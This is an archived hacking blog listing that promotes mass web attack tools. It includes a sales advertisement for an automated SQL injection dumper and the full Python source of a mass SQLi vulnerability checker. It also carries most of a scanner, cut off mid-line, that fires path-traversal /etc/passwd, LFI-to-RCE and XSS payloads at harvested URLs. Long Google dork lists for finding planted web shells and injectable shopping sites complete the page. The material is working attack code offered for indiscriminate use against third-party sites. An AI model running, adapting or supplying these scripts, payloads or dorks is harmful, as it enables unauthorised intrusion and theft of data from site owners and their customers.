Showing posts with label Droks. Show all posts
Showing posts with label Droks. Show all posts
Aug 13, 2012

1
MySQLi Dumper | SQLi Injection Tool

MySQLi Dumper is an advanced automated SQL Injection tool dedicated to SQL injection attacks on MySQL and MS SQL.
It is designed to be automated to find and exploit web security vulnerabilities in mass.
It Is robust, works in the background threads and is super faster.

The power of MySQLi Dumper that makes it different from similar tools:
  1. -Suports Multi. Online search engine (to find the trajects);
  2. -Automated exploiting and analizing from a URL list, with a greats success rate;
  3. -Automated search for columns names from a URL list (search for columns name 'where like %value%', useful to find eg. mails);
  4. -Dumper suport dumping data with multi-threading (databases/tables/columns/fetching data);
  5. -Dumper can dump large data, with greats control of delay per request (multi-threading);
  6. -Easy switch vulnerabilities to vulnerabilities;
  7. -You can see everthing that is load by HTTP request (HTTP Debbuger)
Some features:
  1. -Online mult. search engine;
  2. -Suport MySQL Union, MySQL Error, MS SQL Union, MS SQL Error Integer/String;
  3. -Automated Exploiting;
  4. -Automated Analizing;
  5. -Trash System (you never exploit the same URL);
  6. -Database to collect all vulnerabilities (with option to search for data in mass);
  7. -Customized exploiter and analizer;
  8. -GeoIP database;
  9. -Small browser you can use to Union Count, view source code and HTTP headers;
  10. -Back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running custom SQL statements, suport save/load sessions to XML file;
  11. -Bruter forcing for MySQL <= 4.x
  12. -File dumper for MySQL;
  13. -File dumper Scanner for MySQL;
  14. -Blind dumper for MySQL;
  15. -WAF bypass method;
  16. -Suport single proxy or proxies list (random/by order).
  17. -Hash online crack;
  18. -Admin login finder;
  19. -Multi-Threading;
  20. -User friendly GUI;
Sreen Shots







For using this tool you should know a little about SQL Injections.
Price 60€ / 74 USD Full version.
Full source code 1000€ / 1227 USD
Accepted payments
- libertyreserve.com
- moneybookers.com (trusted users)
- paypal.com (maybe..)
Dependencies: .NET Framework v.4
Demo Version available (older version only)!
Download: http://www.mediafire.com/?wberio939vwh1ez
Demo Limitations
Max. URL per Search 500
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analizer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder are disabled in DEMO EDITION, you can check the Version() only for a demo :)
Load_File() scanner DISABLED
if you bought the v. 4.x
Email me for free update!
Contact: mysqlidumper [ at ] gmail [ dot ] com
May 20, 2012

3
sqliChecker.py v.0.1

sqliChecker it's a mass list sqli vulnerabilty checker who detect vuln sites from a text file in multiple database types like Mysql, Mssql, Msaccess, Oracle. Automaticly remove duplicated sites.
Simple script and easy to use.
python sqliChecker.py vulnlistfile.txt

      
#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : sqliChecker.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 0.1
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org 
# 

import os, sys, subprocess, socket, urllib2, re, time

try:
 set
except NameError:
 from sets import Set as set
 
def timer():
 sec = time.time()
 return sec


def logo():
 print "\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   05/2012     sqliChecker.py v.0.1                            |"
        print "| b4ltazar.wordpress.com     &      ljuska.org                  |"
        print "|                                                               |"
        print "|---------------------------------------------------------------|\n"
  
 
if sys.platform == 'linux' or sys.platform == 'linux2':
  subprocess.call("clear", shell=True)
  logo()
else:
  subprocess.call("cls", shell=True)
  logo()

timeout = 10
socket.setdefaulttimeout(timeout)
log = "sqlivuln.txt"
logfile = open(log, "a")
urls = []
vuln = []

sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
             'Server Error' : 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring' : 'Invalid Querystring',
             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
             'VBScript Runtime' : 'VBScript Runtime',
             'ADODB.Field' : 'ADODB.Field',
             'BOF or EOF' : 'BOF or EOF',
             'ADODB.Command' : 'ADODB.Command',
             'JET Database' : 'JET Database',
             'mysql_fetch_array()' : 'mysql_fetch_array()',
             'Syntax error' : 'Syntax error',
             'mysql_numrows()' : 'mysql_numrows()',
             'GetArray()' : 'GetArray()',
             'FetchRow()' : 'FetchRow()',
             'Input string was not in a correct format' : 'Input string was not in a correct format'}
  
   

if len(sys.argv) != 2:
 print "[+] Usage: python sqliChecker.py "
 print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
 print "[!] Exiting, thanks for using script"
 sys.exit(1)
    
checklist = sys.argv[1]
starttimer = timer()

try:
  check = open(checklist, "r")
  checkline = check.readlines()
  print "[!] You have",len(checkline),"links to check\n"
except(IOError):
  print "[-] Error, check your path or file name!"
  print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
  print "[!] Exiting, thanks for using script"
  sys.exit(1)
  
for url in checkline:
 url = url.replace("\n", "")
 url = url.rsplit('=', 1)[0]+"="
 url = url+"'"
 urls.append(url)
 

def classicINJ(url):
 num = 1
 for url in urls:
  try:
   source = urllib2.urlopen(url).read()
   for type,eMSG in sqlerrors.items():
    if re.search(eMSG, source):
     print num,"/",len(urls), "w00t!,w00t!:", url, "Error:", type, " ---> SQL Injection Found"
     vuln.append(url)
    else:
     pass
  except:
   pass
  
  num += 1

 

if __name__ == "__main__":
 classicINJ(url)  
 print "\n[!] There is %s vulnerable sites to SQL Injection" % len(vuln)
 vulnerable = list(set(vuln))
 print "[+] Without duplicates we have %s vulnerable sites to SQL Injection" % len(vulnerable)
 for v in vulnerable:
  logfile.write("\n"+v)
  
 endtimer = timer()
 print "\n[+] Time used for checking :", int(((endtimer-starttimer) / 60)), "minutes"
 print "[+] Average time per link is :", int(((endtimer-starttimer) / float(len(checkline)))), "seconds"
 print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
or direct link from pastebin http://pastebin.com/raw.php?i=jA7wrWw1

 thanks to baltazar for this script
Apr 13, 2012

7
Dark D0rk3r 0.7

Dark D0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors.


#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : darkd0rk3r.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 0.7
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org 
# 

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
from random import choice

# Colours
W  = "\033[0m";  
R  = "\033[31m"; 
G  = "\033[32m"; 
O  = "\033[33m"; 
B  = "\033[34m";


# Banner
def logo():
	print R+"\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   02/2012     darkd0rk3r.py  v.0.7                            |"
        print "|    b4ltazar.wordpress.com    &   ljuska.org                   |"
        print "|                                                               |"
        print "|---------------------------------------------------------------|\n"
	print W

if sys.platform == 'linux' or sys.platform == 'linux2':
  subprocess.call("clear", shell=True)
  logo()
  
else:
  subprocess.call("cls", shell=True)
  logo()
  
log = "darkd0rk3r-sqli.txt"
logfile = open(log, "a")
lfi_log = "darkd0rk3r-lfi.txt"
lfi_log_file = open(lfi_log, "a")
rce_log = "darkd0rk3r-rce.txt"
rce_log_file = open(rce_log, "a")
xss_log = "darkd0rk3r-xss.txt"
xss_log_file = open(xss_log, "a")

threads = []
finallist = []
vuln = []
timeout = 300
socket.setdefaulttimeout(timeout)



           
lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

xsses = ["

XSS by baltazar

","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"] sqlerrors = {'MySQL': 'error in your SQL syntax', 'MiscError': 'mysql_fetch', 'MiscError2': 'num_rows', 'Oracle': 'ORA-01756', 'JDBC_CFM': 'Error Executing Database Query', 'JDBC_CFM2': 'SQLServer JDBC Driver', 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', 'MSSQL_Uqm': 'Unclosed quotation mark', 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', 'MS-Access_JETdb': 'Microsoft JET Database', 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request', 'Server Error' : 'Server Error', 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error', 'Invalid Querystring' : 'Invalid Querystring', 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC', 'VBScript Runtime' : 'VBScript Runtime', 'ADODB.Field' : 'ADODB.Field', 'BOF or EOF' : 'BOF or EOF', 'ADODB.Command' : 'ADODB.Command', 'JET Database' : 'JET Database', 'mysql_fetch_array()' : 'mysql_fetch_array()', 'Syntax error' : 'Syntax error', 'mysql_numrows()' : 'mysql_numrows()', 'GetArray()' : 'GetArray()', 'FetchRow()' : 'FetchRow()', 'Input string was not in a correct format' : 'Input string was not in a correct format', 'Not found' : 'Not found'} header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'] domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo', 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn', 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc', 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug', 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com', 'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel', 'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum', 'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr', 'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil', 'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia', 'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']} stecnt = 0 for k,v in domains.items(): stecnt += 1 print str(stecnt)+" - "+k sitekey = raw_input("\nChoose your target : ") sitearray = domains[domains.keys()[int(sitekey)-1]] inurl = raw_input('\nEnter your dork : ') numthreads = raw_input('Enter no. of threads : ') maxc = raw_input('Enter no. of pages : ') print "\nNumber of SQL errors :",len(sqlerrors) print "Number of LFI paths :",len(lfis) print "Number of XSS cheats :",len(xsses) print "Number of headers :",len(header) print "Number of threads :",numthreads print "Number of pages :",maxc print "Timeout in seconds :",timeout print "" def search(inurl, maxc): urls = [] for site in sitearray: page = 0 try: while page < int(maxc): jar = cookielib.FileCookieJar("cookies") query = inurl+"+site:"+site results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp' request_web =urllib2.Request(results_web) agent = random.choice(header) request_web.add_header('User-Agent', agent) opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) text = opener_web.open(request_web).read() stringreg = re.compile('(?<=href=")(.*?)(?=")') names = stringreg.findall(text) page += 1 for name in names: if name not in urls: if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name): pass elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name): pass else: urls.append(name) percent = int((1.0*page/int(maxc))*100) urls_len = len(urls) sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page))) sys.stdout.flush() except(KeyboardInterrupt): pass tmplist = [] print "\n\n[+] URLS (unsorted): ",len(urls) for url in urls: try: host = url.split("/",3) domain = host[2] if domain not in tmplist and "=" in url: finallist.append(url) tmplist.append(domain) except: pass print "[+] URLS (sorted) : ",len(finallist) return finallist class injThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicINJ(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False class lfiThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicLFI(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False class xssThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicXSS(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in sqlerrors.items(): if re.search(eMSG, source): print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found" logfile.write("\n"+host) vuln.append(host) else: pass except: pass def ClassicLFI(url): lfiurl = url.rsplit('=', 1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found" lfi_log_file.write("\n"+lfiurl+lfi) vuln.append(lfiurl+lfi) target = lfiurl+lfi target = target.replace("/etc/passwd","/proc/self/environ") header = "" try: request_web = urllib2.Request(target) request_web.add_header('User-Agent', header) text = urllib2.urlopen(request_web) text = text.read() if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text): print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found" rce_log_file.write("\n",target) vuln.append(target) except: pass except: pass def ClassicXSS(url): for xss in xsses: try: source = urllib2.urlopen(url+xss.replace("\n","")).read() if re.findall("XSS by baltazar", source): print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)" xss_log_file.write("\n"+url+xss) vuln.append(url+xss) except: pass def injtest(): print B+"\n[+] Preparing for SQLi scanning ..." print "[+] Can take a while ..." print "[!] Working ...\n" i = len(usearch) / int(numthreads) m = len(usearch) % int(numthreads) z = 0 if len(threads) <= numthreads: for x in range(0, int(numthreads)): sliced = usearch[x*i:(x+1)*i] if (z
 Download
Apr 2, 2012

0
GooDork – Google Dorking Tool

GooDork is a simple python script designed to allow you to leverage the power of Google Dorking straight from the comfort of your command line. 

GooDork offers powerful use of Google’s search directives, by analyzing results from searches using regular expressions that you supply. So basically the purpose of GooDork is to combined Dorking with Regular Expressions.

GooDork allows you to apply regular expressions to any and all of the follow attributes of web applications:
  • URL
  • Displayable Text
  • Anchors
  • Many more options will shortly be made available
Dependencies
GooDork uses the following python packages, please make sure all of them are available
If you are using Python 2.6 you’ll most likely have all of these (except BeautifulSoup).
Installing:
The only installation you need do is to download the entire script package, and make sure the dependencies — listed above — are installed on your machine.
You can download GooDork here (using git):
git clone https://github.com/k3170makan/GooDork
Or read more here.
Aug 29, 2011

0
WordPress Public Bugs List

Hi to all WP Lovers ... Hope u don't have make a mistake with HP :p
Here are most of vulnerable public wordpress plugins .. so check first inside before u install any ...
 
Link here : ExploitDb
Jul 5, 2011

0
vBulletin 4 CMS Recent Articles widget XSS Vulnerability

#~ Title         : vBulletin 4 CMS Recent Articles widget XSS Vulnerability  
#~ Software      : http://www.vbulletin.com
#~ Tested on     : version 4.1.1
#~ Date          : 30/06/2011
#~ Discovered by : X-h4ck
#~ Site          : http://www.pirate.al  , http://theflashcrew.blogspot.com/ 
#~ Email         : mem001@live.com 
#~ Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon
Exploit Link
Oct 29, 2010

0
Hexjector 1.0.7.4

Hexjector is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.

Features:

  • 1.Check for SQL Injection Vulnerablities.
  • 2.Pentest SQL Injection Vulnerablities.
  • 3.Web Application Firewall Detector.
  • 4.Scan For Admin Page
  • 5.Manual Dump Function
  • 6.Browser
  • 7.SQL Injection Type Detection
  • 8.Search For Vulnerable Sites by using Google Dork
  • 9.MD5 Cracker
Download
Oct 20, 2010

0
Dorks to find shells from google

inurl:".php?act=phpinfo"

inurl:".php?act=sql"

inurl:".php?act=exploit"

inurl:".php?act=exploits"

inurl:".php?act=tools"

inurl:".php?act=encoder"

inurl:".php?act=proxy"

inurl:".php?act=shbd"

inurl:".php?act=fsbuff"

inurl:".php?act=rip"

inurl:".php?act=update"

inurl:".php?act=cmd="
Oct 19, 2010

0
CoLLeCTioN Off g00gl3 d0rk's

CoLLeCTioN Off g00gl3 d0rk's By Danzel

Can use with .asp , .cfm , etc. ..
Code:
By intext:  inurl:".php?id=" intext:"View cart" inurl:".php?id=" intext:"Buy Now" inurl:".php?id=" intext:"add to cart" inurl:".php?id=" intext:"shopping" inurl:".php?id=" intext:"boutique" inurl:".php?id=" intext:"/store/" inurl:".php?id=" intext:"/shop/" inurl:".php?id=" intext:"toys"  inurl:".php?cid=" inurl:".php?cid=" intext:"shopping" inurl:".php?cid=" intext:"add to cart" inurl:".php?cid=" intext:"Buy Now" inurl:".php?cid=" intext:"View cart" inurl:".php?cid=" intext:"boutique" inurl:".php?cid=" intext:"/store/" inurl:".php?cid=" intext:"/shop/" inurl:".php?cid=" intext:"Toys"  inurl:".php?cat=" inurl:".php?cat=" intext:"shopping" inurl:".php?cat=" intext:"add to cart" inurl:".php?cat=" intext:"Buy Now" inurl:".php?cat=" intext:"View cart" inurl:".php?cat=" intext:"boutique" inurl:".php?cat=" intext:"/store/" inurl:".php?cat=" intext:"/shop/" inurl:".php?cat=" intext:"Toys"  inurl:".php?catid=" inurl:".php?catid=" intext:"View cart" inurl:".php?catid=" intext:"Buy Now" inurl:".php?catid=" intext:"add to cart" inurl:".php?catid=" intext:"shopping" inurl:".php?catid=" intext:"boutique" inurl:".php?catid=" intext:"/store/" inurl:".php?catid=" intext:"/shop/" inurl:".php?catid=" intext:"Toys"  inurl:".php?categoryid=" inurl:".php?categoryid=" intext:"View cart" inurl:".php?categoryid=" intext:"Buy Now" inurl:".php?categoryid=" intext:"add to cart" inurl:".php?categoryid=" intext:"shopping" inurl:".php?categoryid=" intext:"boutique" inurl:".php?categoryid=" intext:"/store/" inurl:".php?categoryid=" intext:"/shop/" inurl:".php?categoryid=" intext:"Toys"  inurl:".php?pid=" inurl:".php?pid=" intext:"shopping" inurl:".php?pid=" intext:"add to cart" inurl:".php?pid=" intext:"Buy Now" inurl:".php?pid=" intext:"View cart" inurl:".php?pid=" intext:"boutique" inurl:".php?pid=" intext:"/store/" inurl:".php?pid=" intext:"/shop/" inurl:".php?pid=" intext:"toys"  inurl:".php?prodid= inurl:".php?prodid=" intext:"shopping" inurl:".php?prodid=" intext:"add to cart" inurl:".php?prodid=" intext:"Buy Now" inurl:".php?prodid=" intext:"View cart" inurl:".php?prodid=" intext:"boutique" inurl:".php?prodid=" intext:"/store/" inurl:".php?prodid=" intext:"/shop/" inurl:".php?prodid=" intext:"toys"  inurl:".php?productid=' inurl:".php?productid=" intext:"shopping" inurl:".php?productid=" intext:"add to cart" inurl:".php?productid=" intext:"Buy Now" inurl:".php?productid=" intext:"View cart" inurl:".php?productid=" intext:"boutique" inurl:".php?productid=" intext:"/store/" inurl:".php?productid=" intext:"/shop/" inurl:".php?productid=" intext:"Toys"  inurl:".php?product=" inurl:".php?product=" intext:"shopping" inurl:".php?product=" intext:"add to cart" inurl:".php?product=" intext:"Buy Now" inurl:".php?product=" intext:"View cart" inurl:".php?product=" intext:"boutique" inurl:".php?product=" intext:"/store/" inurl:".php?product=" intext:"/shop/" inurl:".php?product=" intext:"toys" inurl:".php?product=" intext:"DVD"  inurl:".php?products=" inurl:".php?products=" intext:"shopping" inurl:".php?products=" intext:"add to cart" inurl:".php?products=" intext:"Buy Now" inurl:".php?products=" intext:"View cart" inurl:".php?products=" intext:"boutique" inurl:".php?products=" intext:"/store/" inurl:".php?products=" intext:"/shop/" inurl:".php?products=" intext:"toys" inurl:".php?products=" intext:"DVD"  inurl:".php?proid=" inurl:".php?proid=" intext:"shopping" inurl:".php?proid=" intext:"add to cart" inurl:".php?proid=" intext:"Buy Now" inurl:".php?proid=" intext:"View cart" inurl:".php?proid=" intext:"boutique" inurl:".php?proid=" intext:"/store/" inurl:".php?proid=" intext:"/shop/" inurl:".php?proid=" intext:"toys"  inurl:".php?shopid=" inurl:".php?shopid=" intext:"shopping" inurl:".php?shopid=" intext:"add to cart" inurl:".php?shopid=" intext:"Buy Now" inurl:".php?shopid=" intext:"View cart" inurl:".php?shopid=" intext:"boutique" inurl:".php?shopid=" intext:"/store/" inurl:".php?shopid=" intext:"/shop/" inurl:".php?shopid=" intext:"Toys"  inurl:".php?itemid=" inurl:".php?itemid=" intext:"shopping" inurl:".php?itemid=" intext:"add to cart" inurl:".php?itemid=" intext:"Buy Now" inurl:".php?itemid=" intext:"View cart" inurl:".php?itemid=" intext:"boutique" inurl:".php?itemid=" intext:"/shop/" inurl:".php?itemid=" intext:"/store/" inurl:".php?itemid=" intext:"Toys"  inurl:".php?orderid=" inurl:".php?orderid=" intext:"shopping" inurl:".php?orderid=" intext:"add to cart" inurl:".php?orderid=" intext:"Buy Now" inurl:".php?orderid=" intext:"View cart" inurl:".php?orderid=" intext:"boutique" inurl:".php?orderid=" intext:"/shop/" inurl:".php?orderid=" intext:"/store/" inurl:".php?orderid=" intext:"Toys"   inurl:".php?catalogId=" inurl:".php?catalogId=" intext:"shopping" inurl:".php?catalogId=" intext:"add to cart" inurl:".php?catalogId=" intext:"Buy Now" inurl:".php?catalogId=" intext:"View cart" inurl:".php?catalogId=" intext:"boutique" inurl:".php?catalogId=" intext:"/shop/" inurl:".php?catalogId=" intext:"/store/" inurl:".php?catalogId=" intext:"Toys"  inurl:".php?aid=" inurl:".php?aid=" intext:"shopping" inurl:".php?aid=" intext:"add to cart" inurl:".php?aid=" intext:"Buy Now" inurl:".php?aid=" intext:"View cart" inurl:".php?aid=" intext:"boutique" inurl:".php?aid=" intext:"/shop/" inurl:".php?aid=" intext:"/store/" inurl:".php?aid=" intext:"toys"  inurl:".php?artid=" inurl:".php?artid=" intext:"shopping" inurl:".php?artid=" intext:"add to cart" inurl:".php?artid=" intext:"Buy Now" inurl:".php?artid=" intext:"View cart" inurl:".php?artid=" intext:"boutique" inurl:".php?artid=" intext:"/shop/" inurl:".php?artid=" intext:"/store/" inurl:".php?artid=" intext:"toys"   inurl:".php?articleid=" inurl:".php?articleid=" intext:"shopping" inurl:".php?articleid=" intext:"add to cart" inurl:".php?articleid=" intext:"Buy Now" inurl:".php?articleid=" intext:"View cart" inurl:".php?articleid=" intext:"boutique" inurl:".php?articleid=" intext:"/shop/" inurl:".php?articleid=" intext:"/store/" inurl:".php?articleid=" intext:"toys"  ### By State  inurl:".php?id=" site:.uk inurl:".php?id=" site:.au inurl:".php?id=" site:.de inurl:".php?id=" site:.at inurl:".php?id=" site:.ca inurl:".php?id=" site:.eu inurl:".php?id=" site:.us inurl:".php?id=" site:.fr  inurl:".php?cid=" site:.uk inurl:".php?cid=" site:.au inurl:".php?cid=" site:.de inurl:".php?cid=" site:.at inurl:".php?cid=" site:.ca inurl:".php?cid=" site:.eu inurl:".php?cid=" site:.us inurl:".php?cid=" site:.fr  inurl:".php?catid=" site:.uk inurl:".php?catid=" site:.au inurl:".php?catid=" site:.de inurl:".php?catid=" site:.at inurl:".php?catid=" site:.ca inurl:".php?catid=" site:.eu inurl:".php?catid=" site:.us inurl:".php?catid=" site:.fr  inurl:".php?categoryid=" site:.uk inurl:".php?categoryid=" site:.au inurl:".php?categoryid=" site:.de inurl:".php?categoryid=" site:.at inurl:".php?categoryid=" site:.ca inurl:".php?categoryid=" site:.eu inurl:".php?categoryid=" site:.us inurl:".php?categoryid=" site:.fr  inurl:".php?pid=" site:.uk inurl:".php?pid=" site:.au inurl:".php?pid=" site:.de inurl:".php?pid=" site:.at inurl:".php?pid=" site:.ca inurl:".php?pid=" site:.eu inurl:".php?pid=" site:.us inurl:".php?pid=" site:.fr  inurl:".php?prodid=" site:.uk inurl:".php?prodid=" site:.au inurl:".php?prodid=" site:.de inurl:".php?prodid=" site:.at inurl:".php?prodid=" site:.ca inurl:".php?prodid=" site:.eu inurl:".php?prodid=" site:.us inurl:".php?prodid=" site:.fr  inurl:".php?productid=" site:.uk inurl:".php?productid=" site:.au inurl:".php?productid=" site:.de inurl:".php?productid=" site:.at inurl:".php?productid=" site:.ca inurl:".php?productid=" site:.eu inurl:".php?productid=" site:.us inurl:".php?productid=" site:.fr  inurl:".php?shopid=" site:.uk inurl:".php?shopid=" 